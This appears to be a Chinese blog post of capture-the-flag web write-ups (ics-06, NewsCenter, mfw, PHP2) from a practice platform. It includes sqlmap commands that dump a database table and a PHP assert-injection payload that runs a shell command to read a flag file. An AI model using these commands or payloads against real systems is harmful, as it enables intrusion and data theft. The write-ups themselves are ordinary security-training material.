攻防世界 WEB篇
2024-10-07 13:30:37
0x01 ics-06
查看源码发现:index.php
一开始直接用sqlmap跑了下没有发现注入,然后用brupsuite爆破参数
0x02 NewsCenter
SQL注入中的POST注入,查阅资料(下方链接)获知注入方法!
python2 sqlmap.py -r post.txt
可以获得如下信息:
- mysql 5 数据库
- Linux Debian9.0的服务器系统
- Apache 2.4.25的
接着来查看该数据库的表:python2 sqlmap.py -r post.txt --dbs
python2 sqlmap.py -r post.txt -D "news" -T "secret_table" --columnspython2 sqlmap.py -r post.txt -D "news" -T "secret_table" -C "fl4g,id" --dump
0x03 mfw
没有发现注入点,扫一波目录看看
在templates目录下发现:
//flag.php
<?php
// TODO
// $FLAG = '';
?>
//index.php
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
assert以及stroops的具体用法百度可知,要使得第一个assert检查第一个断言为False
payload
yoloyanng')or system("cat templates/flag.php");//
$file="templates/yoloyanng')or system("cat templates/flag.php");//.php";
最后执行的就是:
assert("strpos('templates/yoloyanng') or system("cat templates/flag.php");//, '..') === false") or die("Detected hacking attempt!");
最后执行语句:
strpos('templates/yoloyanng') or system("cat templates/flag.php")
0x04 PHP2
首先扫目录也没扫出什么东西来,后来得知是index.phps
最新文章
- iOS学习-UITextField设置placeholder的颜色
- Kerberos简介及常见问题
- Material UI – Material Design CSS 框架
- Unity手游之路<七>角色控制器
- Hibernate Tools for Eclips Plugins
- 【SPOJ】1825. Free tour II(点分治)
- 委托delegate使用方法
- oracle学习 一 (持续更新中)
- MSXML读取XML中文
- Java发送邮件(带附件)
- iOS: 学习笔记, 动态添加按钮
- 导出页面文档(只在IE8下测试过)
- nginx(1)
- 门控开关项目--整流桥分析,LED限流电阻选择
- (一二四)tableView的多组数据展示和手动排序
- window下编译jcef
- makefile中.PHNOY的用法
- php的opcache缓存扩展
- stm8 I/O口模式配置
- 进程池(Pool)